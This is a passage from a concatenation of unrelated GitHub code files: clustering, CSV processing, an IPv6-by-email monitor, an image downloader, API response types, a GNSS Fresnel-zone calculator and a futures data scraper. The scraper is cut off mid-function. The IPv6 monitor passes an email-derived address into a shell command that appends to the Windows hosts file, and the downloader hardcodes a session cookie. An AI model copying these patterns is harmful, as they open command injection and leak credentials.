bin_seeding=True)\n\nms.fit(X)\n\nlabels = ms.labels_\nprint(labels)\n\ncluster_centers = ms.cluster_centers_\nprint('cluster_centers:', cluster_centers)\n##总共的标签分类\nlabels_unique = np.unique(labels)\n\nn_clusters_ = len(labels_unique)\nprint(\"number of estimated clusters : %d\" % n_clusters_)","repo_name":"Leo-Bright/OSMparser","sub_path":"station_clustering.py","file_name":"station_clustering.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"36952496162","text":"import pandas as pd\n\ndata = pd.read_csv(\"HighD_1.csv\", header=0)\nname = ['Frame_ID', 'Vehicle_ID', 'x', 'y', 'v', 'a', 'preceding_ID', 'lane_ID']\ncontent = []\nmax_val = data.shape[0]\nindex = 0\n\nwhile index < max_val:\n cur_list = data.loc[index].values[:]\n right = index + 1\n if right >= max_val:\n break\n next_list = data.loc[right].values[:]\n while next_list[1] == cur_list[1]:\n right += 1\n if right >= max_val:\n break\n next_list = data.loc[right].values[:]\n if right - index > 80:\n period = data[index: right]\n period = period.values.tolist()\n content += period\n index = right\n\n\nprint(len(content))\noutput = pd.DataFrame(columns=name, data=content)\noutput.to_csv('HighD_1_1.csv', index=False)","repo_name":"Breeze-P/tcn_working_sapce","sub_path":"car_following/generalization/step2.py","file_name":"step2.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"30623257033","text":"import csv\nimport sys\n\n\ndef parse_csv(filename):\n \"\"\"\n Takes a csv file filename, parses it and returns a list of dicts.\n :param filename:\n :return:\n \"\"\"\n with open(filename, newline='') as f:\n reader = csv.DictReader(f)\n data = []\n try:\n for row in reader:\n data.append(row)\n return data\n except csv.Error as e:\n sys.exit('file {}, line {}: {}'.format(filename, reader.line_num, 
e))","repo_name":"Streamweaver/dnd_playground","sub_path":"dnd_data/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"14588675441","text":"import os\r\nimport re\r\nimport requests\r\nimport socket\r\nimport subprocess\r\nimport time\r\nimport email\r\nimport smtplib\r\nimport logging\r\nfrom email.header import Header\r\nfrom email.mime.text import MIMEText\r\nfrom html import unescape\r\nfrom email.header import decode_header\r\nimport poplib\r\n\r\nclass IPv6_monitor():\r\n def __init__(self):\r\n LOG_FORMAT = \"%(asctime)s.%(msecs)03d - %(levelname)s - %(message)s\"\r\n DATE_FORMAT = \"%Y/%m/%d %H:%M:%S\"\r\n logfilename = time.strftime(\"%Y-%m-%d %H-%M-%S\",time.localtime()) \r\n logging.basicConfig(filename=logfilename+'.log', level=logging.INFO, format=LOG_FORMAT, datefmt=DATE_FORMAT)\r\n self.email_account = 'xxxx@xx.com'\r\n self.password = 'xxxxxxxxxx'\r\n self.pop3_server = 'pop.xx.com'\r\n self.smtp_server = 'smtp.xx.com'\r\n try:\r\n with open(os.path.join(os.path.abspath('./'),'ipv6cache.txt'),'r') as a:\r\n ipv6_addresses = a.readlines()\r\n except: \r\n file = open(os.path.join(os.path.abspath('./'),'ipv6cache.txt','w'))\r\n file.close()\r\n\r\n def get_ipv6_address(self):\r\n ipv6_addresses = []\r\n addresses_info = socket.getaddrinfo(socket.gethostname(),None)\r\n for item in addresses_info:\r\n if ':' in item[4][0]:\r\n ipv6_addresses.append(item[4][0])\r\n ipv6_address = None\r\n for ip in ipv6_addresses:\r\n if ip.split(':')[0].find('240e') >= 0 or ip.split(':')[0].find('2400') >= 0 or ip.split(':')[0].find('2408') >= 0 or ip.split(':')[0].find('2001') >= 0:\r\n ipv6_address = ip\r\n break\r\n return ipv6_address\r\n\r\n def obtain_ipv6_address_from_email(self):\r\n # 连接到POP3服务器:\r\n server = poplib.POP3_SSL(self.pop3_server)\r\n # 可以打开或关闭调试信息:\r\n server.set_debuglevel(0)\r\n # 身份认证:\r\n server.user(self.email_account)\r\n server.pass_(self.password)\r\n\r\n resp, mails, octets = server.list()\r\n # 可以查看返回的列表类似[b'1 82923', b'2 2184', ...]\r\n email_titles=[] \r\n\r\n for i in range(len(mails)): \r\n message = b'\\n'.join(server.retr(i+1)[1])\r\n mail = email.message_from_bytes(message)\r\n subject = mail.get(\"Subject\")\r\n try:\r\n dh = decode_header(subject)\r\n if dh[0][1] == None:\r\n email_titles.append(dh[0][0])\r\n else:\r\n result = dh[0][0].decode(dh[0][1])\r\n email_titles.append(result)\r\n except:\r\n email_titles.append(str(decode_header(subject)[0][0]))\r\n continue\r\n\r\n newest_index = len(email_titles)\r\n for j in range(len(email_titles)):\r\n if email_titles[j].find('获得的ipv6地址') >= 0 :\r\n newest_index = j + 1\r\n newest_message = b'\\n'.join(server.retr(newest_index)[1])\r\n newest_mail = email.message_from_bytes(newest_message)\r\n server.quit()\r\n ipv6_pattern='(([a-f0-9]{1,4}:){0,7}[a-f0-9]{1,4})'\r\n m = re.search(ipv6_pattern, str(self.get_file(newest_mail)))\r\n try:\r\n if m is not None and len(m.group()) > 10:\r\n return m.group()\r\n else:\r\n ipv6_pattern='([a-f0-9:]*::[a-f0-9:]*)'\r\n m = re.search(ipv6_pattern, str(self.get_file(newest_mail)))\r\n return m.group()\r\n except:\r\n try:\r\n result = re.findall(r\"(([a-f0-9]{1,4}:){7}[a-f0-9]{1,4})\", str(self.get_file(newest_mail)), re.I)[0][0]\r\n return result\r\n except:\r\n print('出现错误')\r\n\r\n def get_file(self, msg):\r\n data_char=''\r\n for part in msg.walk():\r\n part_charset=part.get_content_charset()\r\n part_type=part.get_content_type()\r\n if 
part_type==\"text/plain\" or part_type=='text/html':\r\n data=part.get_payload(decode=True)\r\n try:\r\n data=data.decode(part_charset,errors=\"replace\")\r\n except:\r\n data=data.decode('gb2312',errors=\"replace\")\r\n data=self.html_to_plain_text(data)\r\n data_char=data_char+'\\n'+data\r\n return data_char+'\\n'\r\n\r\n def html_to_plain_text(self, html):\r\n text = re.sub('.*?', ' ', html, flags=re.M | re.S | re.I)\r\n text = re.sub(r'', ' HYPERLINK ', text, flags=re.M | re.S | re.I)\r\n text = re.sub('<.*?>', ' ', text, flags=re.M | re.S)\r\n text = re.sub(r'(\\s*\\n)+', '\\n', text, flags=re.M | re.S)\r\n return unescape(text)\r\n\r\n def send_ipv6_address_to_email(self,ipv6_address):\r\n msg = MIMEText(socket.gethostname()+'的IPV6地址为:'+ipv6_address, 'plain', 'utf-8') \r\n server = smtplib.SMTP(self.smtp_server, 25) # SMTP协议默认端口是25 \r\n server.login(self.email_account, self.password) # 登录SMTP服务器\r\n msg['From'] = self.email_account+' <'+self.email_account+'>'\r\n msg['Subject'] = Header(u'获得的ipv6地址', 'utf8').encode()\r\n msg['To'] = u'<'+self.email_account+'>'\r\n server.sendmail(self.email_account, [self.email_account], msg.as_string()) # 发邮件\r\n logging.info('IPV6地址:'+ipv6_address+'已发送')\r\n server.quit()\r\n\r\n def read_ipv6_address(self): \r\n path = os.path.join(os.path.abspath('./'),'ipv6cache.txt')\r\n with open(path,'r') as a:\r\n ipv6_addresses = a.readlines()\r\n if ipv6_addresses[-1][-1] == '\\n':\r\n ipv6_address = ipv6_addresses[-1][0:-1]\r\n elif ipv6_addresses[-1][-1] != '\\n':\r\n ipv6_address = ipv6_addresses[-1]\r\n return ipv6_address\r\n\r\n def read_ipv6_address_from_host(self): \r\n path = r'C:\\Windows\\System32\\drivers\\etc\\hosts'\r\n ipv6_addresses = []\r\n with open(path,'r', encoding=\"utf-8\") as a:\r\n hosts_strs = a.readlines()\r\n for hosts_str in hosts_strs:\r\n if hosts_str.find('www.xxxx.com') >= 0 :\r\n ipv6_addresses.append(hosts_str)\r\n return ipv6_addresses[-1].split()[0]\r\n\r\n def write_ipv6_address(self,ipv6_address):\r\n path = os.path.join(os.path.abspath('./'),'ipv6cache.txt')\r\n with open(path,'r') as a:\r\n ipv6_addresses = a.readlines()\r\n if ipv6_addresses[-1] == ipv6_address or ipv6_addresses[-1] == ipv6_address+'\\n':\r\n pass\r\n else:\r\n with open('ipv6cache.txt', 'a', encoding=\"utf-8\") as file_object:\r\n if ipv6_addresses[-1][-1] != '\\n':\r\n file_object.write('\\n'+ipv6_address)\r\n logging.info('IPV6地址:'+ipv6_address+'已缓存')\r\n elif ipv6_addresses[-1][-1] == '\\n':\r\n file_object.write(ipv6_address+'\\n')\r\n logging.info('IPV6地址:'+ipv6_address+'已缓存')\r\n\r\n def synchronize_ipv6_address(self):\r\n if self.current_ipv6_address != self.stored_ipv6_address or self.current_ipv6_address.find(self.stored_ipv6_address) < 0: \r\n self.write_ipv6_address(self.current_ipv6_address)\r\n self.stored_ipv6_address = self.read_ipv6_address()\r\n logging.info('已同步当前与缓存中存储的地址')\r\n if self.current_ipv6_address != self.email_ipv6_address or self.current_ipv6_address.find(self.email_ipv6_address) < 0:\r\n self.send_ipv6_address_to_email(self.current_ipv6_address)\r\n self.email_ipv6_address = self.obtain_ipv6_address_from_email()\r\n logging.info('已同步当前与邮件中存储的地址')\r\n\r\n def change_ipv6_address(self,ipv6_address):\r\n subprocess.Popen('echo '+ipv6_address+' www.xxxx.com >> %systemroot%\\system32\\drivers\\etc\\hosts',shell=True)\r\n\r\n def get_ipv6_address_from_web(self):\r\n try:\r\n ipv6_address = requests.get('https://v6.ident.me').text\r\n except:\r\n ipv6_address = None\r\n return ipv6_address\r\n\r\n def 
disconnect_WLAN(self):\r\n subprocess.Popen('netsh wlan disconnect')\r\n\r\n def disable_WLAN(self,interface):\r\n subprocess.Popen('netsh interface set interface \"'+interface+'\" disabled')\r\n\r\n def enable_WLAN(self,interface):\r\n subprocess.Popen('netsh interface set interface \"'+interface+'\" enabled') \r\n\r\n def connect_WLAN(self,wlan_name):\r\n logging.info('正在联网')\r\n subprocess.Popen('netsh wlan connect name='+wlan_name)\r\n\r\n def show_WLAN_interface(self):\r\n interface = subprocess.Popen('netsh wlan show interface').readlines()\r\n return interface[3][interface[3].find(':')+2:-1]\r\n\r\n def ip_monitor(self,wlan_name):\r\n # 初始化\r\n self.check_flag = 1\r\n logging.info('初始化开始') \r\n self.current_ipv6_address = self.get_ipv6_address()\r\n self.stored_ipv6_address = self.read_ipv6_address()\r\n self.email_ipv6_address = self.obtain_ipv6_address_from_email() \r\n if self.current_ipv6_address is not None:\r\n self.synchronize_ipv6_address('monitor')\r\n elif self.current_ipv6_address is None:\r\n while True:\r\n if self.current_ipv6_address is None:\r\n time.sleep(0.2)\r\n self.connect_WLAN(wlan_name)\r\n time.sleep(5)\r\n self.current_ipv6_address = self.get_ipv6_address()\r\n elif self.current_ipv6_address is not None:\r\n self.synchronize_ipv6_address('monitor')\r\n break\r\n logging.info('初始化完成')\r\n logging.info('开始监控')\r\n while True:\r\n self.current_ipv6_address = self.get_ipv6_address()\r\n # 检查联网\r\n if self.current_ipv6_address is None:\r\n while True:\r\n if self.current_ipv6_address is None: \r\n time.sleep(0.2)\r\n self.connect_WLAN(wlan_name)\r\n time.sleep(5)\r\n self.current_ipv6_address = self.get_ipv6_address()\r\n elif self.current_ipv6_address is not None:\r\n logging.info('联网成功')\r\n break\r\n # 检查ip变化 \r\n if self.current_ipv6_address is not None:\r\n self.synchronize_ipv6_address('monitor') \r\n if self.check_flag == 1:\r\n self.check_flag = 0\r\n try:\r\n self.get_ipv6_address_from_web()\r\n except:\r\n self.disconnect_WLAN()\r\n time.sleep(0.3)\r\n self.connect_WLAN(wlan_name)\r\n time.sleep(60)\r\n elif self.check_flag == 0:\r\n time.sleep(60)\r\n self.check_flag = 1 \r\n\r\nif __name__ == \"__main__\":\r\n IPv6_monitor().ip_monitor('wifi_name')","repo_name":"Morihaojie/ipv6monitor","sub_path":"ipv6monitor.py","file_name":"ipv6monitor.py","file_ext":"py","file_size_in_byte":11203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"27907389929","text":"import urllib,re,requests\nimport sys\nimport util\nimport json\nimport os\nfrom bs4 import BeautifulSoup\nheaders = {\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',\n 'Cookie':'MUID=0DA4D4BD498D6CFB3AA9D9BE4D8D6820; _SS=SID=00; videoCookiesLastCategory=en-ca=animals; _cb_ls=1; _cb=DsAPZCJmzJ0BiCB2c; _chartbeat2=.1550504320201.1550509083431.11.uAsG96ZMUeDgWcawC2JWWNCmna0Z.1; ANON=A=E43533FD3C93526D33F4F5C4FFFFFFFF&E=164d&W=1; NAP=V=1.9&E=15f3&C=gBm5NGQ6hq9_2JLke_9M_uUX-nhzUVJp3UwliRTchLXC4pE05Iv2DA&W=1; vidvol=10; adoptout={\"msaOptOut\":0,\"adIdOptOut\":0}; videoerrorcount=0; trg=0%7C0%7C0; ecasession=v2_9a22cfec7b49fc3893239e7b074a63fd_ba74fcd1-eff2-48d8-b6af-082423d58358-tuct35eea8e_1550666026_1550666984_CNawjgYQqLw-GP6e37rd9J7zBiACKAYwMDjK_QdA_qAQSI7OHlCJxAlYAGAC'\n}\n\ndef download(url, path):\n if (not os.path.exists(path)):\n urllib.request.urlretrieve(url, path)\n\ndef readFrom(path) :\n f = open(path, \"r\")\n text = f.readlines()\n f.close()\n 
return text\n\n# check folder existed or not, if not create it\ndef checkAndCreateFolder(folderName):\n if (not os.path.exists(folderName)):\n os.makedirs(folderName)\n\nif __name__ == \"__main__\":\n imgFile = r\"F:\\mayun\\Note\\Python\\Spider\\source\\img.txt\"\n images = readFrom(imgFile)\n i = 1\n j = 139\n for item in images:\n targetDir= r\"H:\\自媒体\\图片\\umei\"\n targetDir = os.path.join(targetDir, str(j))\n checkAndCreateFolder(targetDir)\n targetFile = os.path.join(targetDir, str(i)+'.jpg')\n download(item, targetFile)\n if i % 5 == 0:\n i = 0\n j = j +1\n i = i +1\n","repo_name":"Cary123/note","sub_path":"Python/Spider/downloadImg.py","file_name":"downloadImg.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"45"} +{"seq_id":"29233382454","text":"import typing\nimport enum\nfrom vkbottle_types.responses.base_response import BaseResponse, BaseModel\nfrom vkbottle_types.base_model import Field\n\nfrom vkbottle_types.objects import (\n PollsFriend,\n PollsPollAnonymous,\n BaseImage,\n PollsVotersFieldsUsers,\n UsersUserFull,\n BaseGradientPoint,\n PollsVotersUsers,\n PollsBackground,\n PollsAnswer,\n)\n\n\nclass PollsAnswerResponseModel(BaseModel):\n id: int = Field(\n description=\"Answer ID\",\n )\n\n rate: float = Field(\n description=\"Answer rate in percents\",\n )\n\n text: str = Field(\n description=\"Answer text\",\n )\n\n votes: int = Field(\n description=\"Votes number\",\n )\n\n\nclass PollsAnswerResponse(BaseResponse):\n response: \"PollsAnswerResponseModel\"\n\n\nclass PollsBackgroundResponseModel(BaseModel):\n angle: typing.Optional[int] = Field(\n default=None,\n description=\"Gradient angle with 0 on positive X axis\",\n )\n\n color: typing.Optional[str] = Field(\n default=None,\n description=\"Hex color code without #\",\n )\n\n height: typing.Optional[int] = Field(\n default=None,\n description=\"Original height of pattern tile\",\n )\n\n id: typing.Optional[int] = Field(\n default=None,\n )\n\n name: typing.Optional[str] = Field(\n default=None,\n )\n\n images: typing.Optional[typing.List[BaseImage]] = Field(\n default=None,\n description=\"Pattern tiles\",\n )\n\n points: typing.Optional[typing.List[BaseGradientPoint]] = Field(\n default=None,\n description=\"Gradient points\",\n )\n\n type: typing.Optional[typing.Literal[\"gradient\", \"tile\"]] = Field(\n default=None,\n )\n\n width: typing.Optional[int] = Field(\n default=None,\n description=\"Original with of pattern tile\",\n )\n\n\nclass PollsBackgroundResponse(BaseResponse):\n response: \"PollsBackgroundResponseModel\"\n\n\nclass PollsFieldsVotersResponseModel(BaseModel):\n answer_id: typing.Optional[int] = Field(\n default=None,\n description=\"Answer ID\",\n )\n\n users: typing.Optional[\"PollsVotersFieldsUsers\"] = Field(\n default=None,\n )\n\n answer_offset: typing.Optional[str] = Field(\n default=None,\n description=\"Answer offset\",\n )\n\n\nclass PollsFieldsVotersResponse(BaseResponse):\n response: \"PollsFieldsVotersResponseModel\"\n\n\nclass PollsFriendResponseModel(BaseModel):\n id: int = Field()\n\n\nclass PollsFriendResponse(BaseResponse):\n response: \"PollsFriendResponseModel\"\n\n\nclass PollsPollResponseModel(BaseModel):\n multiple: bool = Field(\n description=\"Information whether the poll with multiple choices\",\n )\n\n end_date: int = Field()\n\n closed: bool = Field()\n\n is_board: bool = Field()\n\n can_edit: bool = Field()\n\n can_vote: bool = Field()\n\n can_report: bool = Field()\n\n can_share: bool = 
Field()\n\n answers: typing.List[PollsAnswer] = Field()\n\n created: int = Field(\n description=\"Date when poll has been created in Unixtime\",\n )\n\n id: int = Field(\n description=\"Poll ID\",\n )\n\n owner_id: int = Field(\n description=\"Poll owner's ID\",\n )\n\n question: str = Field(\n description=\"Poll question\",\n )\n\n votes: int = Field(\n description=\"Votes number\",\n )\n\n disable_unvote: bool = Field()\n\n anonymous: typing.Optional[\"PollsPollAnonymous\"] = Field(\n default=None,\n )\n\n friends: typing.Optional[typing.List[PollsFriend]] = Field(\n default=None,\n )\n\n answer_id: typing.Optional[int] = Field(\n default=None,\n description=\"Current user's answer ID\",\n )\n\n answer_ids: typing.Optional[typing.List[int]] = Field(\n default=None,\n description=\"Current user's answer IDs\",\n )\n\n embed_hash: typing.Optional[str] = Field(\n default=None,\n )\n\n photo: typing.Optional[\"PollsBackground\"] = Field(\n default=None,\n )\n\n author_id: typing.Optional[int] = Field(\n default=None,\n description=\"Poll author's ID\",\n )\n\n background: typing.Optional[\"PollsBackground\"] = Field(\n default=None,\n )\n\n\nclass PollsPollResponse(BaseResponse):\n response: \"PollsPollResponseModel\"\n\n\nPollsPollAnonymousResponseModel = bool\n\n\nclass PollsPollAnonymousResponse(BaseResponse):\n response: \"PollsPollAnonymousResponseModel\"\n\n\nclass PollsVotersResponseModel(BaseModel):\n answer_id: typing.Optional[int] = Field(\n default=None,\n description=\"Answer ID\",\n )\n\n users: typing.Optional[\"PollsVotersUsers\"] = Field(\n default=None,\n )\n\n answer_offset: typing.Optional[str] = Field(\n default=None,\n description=\"Answer offset\",\n )\n\n\nclass PollsVotersResponse(BaseResponse):\n response: \"PollsVotersResponseModel\"\n\n\nclass PollsVotersFieldsUsersResponseModel(BaseModel):\n count: typing.Optional[int] = Field(\n default=None,\n description=\"Votes number\",\n )\n\n items: typing.Optional[typing.List[UsersUserFull]] = Field(\n default=None,\n )\n\n\nclass PollsVotersFieldsUsersResponse(BaseResponse):\n response: \"PollsVotersFieldsUsersResponseModel\"\n\n\nclass PollsVotersUsersResponseModel(BaseModel):\n count: typing.Optional[int] = Field(\n default=None,\n description=\"Votes number\",\n )\n\n items: typing.Optional[typing.List[int]] = Field(\n default=None,\n )\n\n\nclass PollsVotersUsersResponse(BaseResponse):\n response: \"PollsVotersUsersResponseModel\"\n","repo_name":"vkbottle/types","sub_path":"vkbottle_types/codegen/responses/polls.py","file_name":"polls.py","file_ext":"py","file_size_in_byte":5489,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"45"} +{"seq_id":"72882838857","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTo compute and show the first Fresnel Zone.\n\n@author: Lubin Roineau, ENSG-Geomatics (internship at UT-ITC Enschede), Aug 26, 2022\n\"\"\"\n\n# Usefull librairies\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math as m\nfrom geod import *\nfrom shapely.geometry.polygon import Polygon\nimport pyproj\n\n# Usefull constants\nc = 299792458 # m.s-1 Speed of light\nL1_GPS = 1575.42e6 # Hz L1 frequency for GPS\nL2_GPS = 1227.60e6 # Hz L2 frequency for GPS\nL1_Glo = 1602.0e6 # Hz L1 frequency for GLONASS\nL2_Glo = 1246.0e6 # Hz 21 frequency for GLONASS\nlambda_L1_GPS = (c/L1_GPS) # m wavelenght for L1 GPS\nlambda_L2_GPS = (c/L2_GPS) # m wavelenght for L2 GPS\nlambda_L1_Glo = (c/L1_Glo) # m wavelenght for L1 Glo\nlambda_L2_Glo = (c/L2_Glo) # m wavelenght for L2 
Glo\n\n###############################################################################\n\n# Calculation of the First Fresnel Zone\n\ndef firstFresnelZone(freq, h, elev):\n \"\"\"\n This function gets the size and center of the First Fresnel Zone ellipse.\n (based on a code by Kristine Larson and Carolyn Roesler).\n \n Parameters\n ----------\n freq: float\n Frequence of L_band in Hz.\n h: float\n Hight of the receiver in meters.\n elev: float\n Satellite elevation angle in degrees.\n \n Return\n ------\n a: float\n Semi-major axis, aligned with the satellite azimuth (meters).\n b: float\n Semi-minor axis (meters).\n R: float \n Locates the center of the ellispe on the satellite azimuth direction \n and R meters away from the base of the Antenna.\n \"\"\"\n # Valid frequencies\n lfreqgps = [L1_GPS, L2_GPS]\n lfreqglo = [L1_Glo, L2_Glo]\n\n # Check if frequency is valid\n if freq in lfreqgps and freq in lfreqglo:\n raise Exception(\"Wrong value for L_band frequency\") \n\n if elev>90:\n raise Exception(\"Wrong value for elevation, can't excede 90° !\") \n\n # Directly put elevation in radians\n elevR = np.radians(elev)\n \n if freq in lfreqgps:\n # delta = locus of points corresponding to a fixed delay;\n # typically the first Fresnel zone is is the\n # \"zone for which the differential phase change across\n # the surface is constrained to lambda/2\" (i.e. 1/2 the wavelength)\n d = lambda_L1_GPS/2\n\n # from the appendix of Larson and Nievinski, 2013\n # semi-minor axis\n b = ((lambda_L1_GPS*h)/np.sin(elevR)) + (lambda_L1_GPS/(2*np.sin(elevR)))**2\n b = np.sqrt(b)\n # semi-majpr axis\n a = b/np.sin(elevR)\n\n elif freq in lfreqglo:\n # delta = locus of points corresponding to a fixed delay;\n # typically the first Fresnel zone is is the\n # \"zone for which the differential phase change across\n # the surface is constrained to lambda/2\" (i.e. 
1/2 the wavelength)\n d = lambda_L1_Glo/2\n\n # from the appendix of Larson and Nievinski, 2013\n # semi-minor axis\n b = ((lambda_L1_Glo*h)/np.sin(elevR)) + (lambda_L1_Glo/(2*np.sin(elevR)))**2\n b = np.sqrt(b)\n # semi-majpr axis\n a = b/np.sin(elevR)\n \n # determine distance to ellipse center in meters\n R = (h + d/np.sin(elevR)) / np.tan(elevR)\n\n return a, b, R\n\n###############################################################################\n\ndef plotEllipse(a, b, R, lon, lat, h, azim):\n \"\"\"\n Create an ellipse of a Fresnel zone.\n \n Parameters\n ----------\n a: float\n Semi-major axis, aligned with the satellite azimuth (meters).\n b: float\n Semi-minor axis (meters).\n R: float \n Locates the center of the ellispe on the satellite azimuth direction \n and R meters away from the base of the Antenna.\n lon,lat: float\n Position of the receiver in geographical coordinates (degrees).\n h: float\n Hight of the receiver in meters.\n azim: float\n Given azimut of ellipse in degrees.\n \n Return\n ------\n p: Polygon\n Polygon of the ellipse.\n area: float\n Area of the Polygon in square meter.\n \"\"\"\n # Check input for the azimuth in case\n if azim > 360 or azim < 0:\n raise Exception(\"Wrong value of azimuth, should be between 0 and 360!\") \n \n # Set coordinates of the receiver to cartesians\n transformer = pyproj.Transformer.from_crs(\"EPSG:4326\", \"EPSG:3857\", always_xy = True)\n X = transformer.transform(lon, lat)[0]\n Y = transformer.transform(lon, lat)[1]\n \n # Set to radians\n azim = m.radians(azim)\n \n # Change angle to match orientation of Python\n angle = 2*np.pi - azim + np.pi/2\n \n # Coordinate of the center\n xR = X + R*np.cos(angle) \n yR = Y + R*np.sin(angle)\n \n t = np.linspace(0, 2*np.pi, 100)\n\n # Parametric equation of ellipse\n x = xR + a*np.cos(angle)*np.cos(t) - b*np.sin(angle)*np.sin(t)\n y = yR + a*np.sin(angle)*np.cos(t) + b*np.cos(angle)*np.sin(t)\n\n # Polygon of ellipse in epsg:3857\n q = Polygon(list(zip(x,y)))\n area = q.area\n \n # Changing back the coordinates to geographic\n lon = []\n lat = []\n for i in range(len(x)):\n lo = transformer.transform(x[i], y[i],direction='INVERSE')[0]\n la = transformer.transform(x[i], y[i],direction='INVERSE')[1]\n lon.append(lo)\n lat.append(la)\n \n # Polygon of ellipse in epsg:4326\n p = Polygon(list(zip(lon,lat)))\n\n return p, area\n\n###############################################################################\n\ndef specularPoint(a, b, R, azim, color=None):\n \"\"\"\n This function just return the center of an ellipse, i.e the reflection point.\n\n Parameters\n ----------\n a: float\n Semi-major axis, aligned with the satellite azimuth (meters).\n b: float\n Semi-minor axis (meters).\n R: float \n Locates the center of the ellispe on the satellite azimuth direction \n and R meters away from the base of the Antenna.\n azim: list \n List of azimuths\n color: String (optional)\n Color of center points.\n\n Returns\n -------\n Plot of center of ellipses.\n\n \"\"\"\n for angle in azim:\n \n angle = 2*np.pi - angle + np.pi/2\n xR = R*np.cos(angle) # x-position of the center\n yR = R*np.sin(angle) # y-position of the center\n\n if color != None:\n plt.axis('equal')\n plt.scatter(xR,yR, color=color)\n else:\n plt.axis('equal')\n plt.scatter(xR,yR)\n\n 
return\n\n###############################################################################","repo_name":"lroineau/gnssr4river","sub_path":"gnssr4river/Fresnel/fresnelzone.py","file_name":"fresnelzone.py","file_ext":"py","file_size_in_byte":6681,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"45"} +{"seq_id":"43085047873","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 22 16:26:42 2018\n\n@author: weiss\n\n2018\n\n4.22\n1.增加了近月函数this_contract()\n2.调整了部分语法结构适应合约key\n3.调整了部分逻辑冗余\n\n4.23\n1.修复更新bug\n\n4.30\n1.修复近月合约数据缺失\n\n5.7\n1.改正近月合约定义\n\n5.8\n1.修正合并数据逻辑\n\n5.10\n1.修正合并数据部分的代码误删和错误\n2.精简和优化部分代码结构\n\n5.11-5.12\n1.增加contract_indic选项(None、'this'、'this&next'),丰富相关逻辑\n2.优化代码逻辑结构\n\n5.18\n1.增加中金所爬虫函数以及对应信号函数\n\n7.16\n1.增加中金所爬虫函数的向后更新功能\n2.增加中金所前5、前10的信号,优化输出格式\n\"\"\"\n\n\nimport time as t\nimport datetime\nimport pandas as pd\nimport numpy as np\nimport os\nimport warnings\nwarnings.filterwarnings(\"ignore\")\ntry:\n from urllib.request import urlopen, Request\n from urllib.error import HTTPError\nexcept ImportError:\n from urllib2 import urlopen, Request\n from urllib2 import HTTPError\nimport xml.etree.ElementTree as ET\n#from WindPy import *\n#w.start()\n\n\nclass oir(object):\n\n def __init__(self,homePath, updatebegin = 20100101, endDate = \\\n int(t.strftime('%Y%m%d',t.localtime(t.time()))) ,params = [5,10,20]):\n self.homePath = homePath + '/'\n self.tradeDateList = pd.read_csv(self.homePath +'tradeDateList.csv')\n self.params = params\n self.suffix = '.h5'\n self.beginDate = updatebegin\n self.time = t.time()\n if t.localtime(self.time).tm_hour < 15:\n self.workDate = int(t.strftime('%Y%m%d',\\\n t.localtime(self.time - 24 * 60 *60)))\n else:\n self.workDate = int(t.strftime('%Y%m%d',t.localtime(self.time)))\n #确定所需更新的日期\n if endDate < self.workDate:\n self.workDate = endDate\n\n def this_contract(self,windSymbol):\n symbol = windSymbol.split('.')[0]\n def change_spot(y_month):\n weekday = datetime.datetime.strptime(y_month+'-01', \"%Y-%m-%d\").weekday()\n if weekday <= 5:\n return (14 + 5 - weekday)\n else:\n return (14 + 6)\n def this_month(date):\n day = np.int32(str(date)[6:8])\n if day >= change_spot(str(date)[:4]+'-'+str(date)[4:6]):\n month = np.int32(str(date)[4:6])\n if month == 12:\n return str(np.int32(str(date)[2:4])+1)+'01'\n else:\n return str(date)[2:4]+\"%02d\"%(month%12+1)\n else:\n return str(date)[2:6]\n self.tradeDateList[symbol+'_contract'] = \\\n self.tradeDateList['tradeDate'].apply(lambda x : symbol+this_month(x))\n self.tradeDateList.to_csv(self.homePath +'tradeDateList.csv', index=None)\n\n def next_contract(self,windSymbol):\n symbol = windSymbol.split('.')[0]\n def _next(contract):\n month = np.int32(contract[-2:])\n if month%3 == 0:\n return '0'\n else:\n return contract[:-2]+\"%02d\"%(month+(3-month%3))\n self.tradeDateList[symbol+'_next'] = \\\n self.tradeDateList[symbol+'_contract'].apply(lambda x : _next(x))\n self.tradeDateList.to_csv(self.homePath +'tradeDateList.csv', index=None)\n\n def updateDataFromWind(self,windSymbol,contract_indic=None):\n symbol = windSymbol.split('.')[0]\n colNames = ['tradeDate','ranks','member_name','long_position',\n 'long_position_increase','short_position',\n 'short_position_increase','volume']\n colNamesFinal = ['tradeDate','ranks','member_name','long_position',\n 'long_position_increase','short_position',\n 'short_position_increase','net_position',\n 'net_position_increase','volume','updatingTime']\n colNamesCon = 
['tradeDate','member_name','long_position',\n 'long_position_increase','short_position',\n 'short_position_increase','net_position',\n 'net_position_increase','volume','updatingTime']\n\n #获取合约数据的函数\n def getFutureoirByDate(beginDate,endDate,windSymbol,windCode,position):\n if windCode:\n data = w.wset(\"futureoir\",\"startdate=\"+beginDate+\";enddate=\"+\n endDate+\";varity=\"+windSymbol+\";wind_code=\" +\n windCode + \";order_by=\" + position +\n \";ranks=all;field=date,ranks,member_name,long_position,long_position_increase,short_position,short_position_increase,vol\")\n else:\n data = w.wset(\"futureoir\",\"startdate=\"+beginDate+\";enddate=\"+\n endDate+\";varity=\"+windSymbol+ \";order_by=\" + position +\n \";ranks=all;field=date,ranks,member_name,long_position,long_position_increase,short_position,short_position_increase,vol\")\n if len(data.Data) == 0:\n return pd.DataFrame([])\n dataout = pd.DataFrame()\n try:\n for i in range(len(colNames)):\n dataout[colNames[i]] = data.Data[i]\n except:\n print(windSymbol + \" cannot get data on \" + date + ' !')\n return 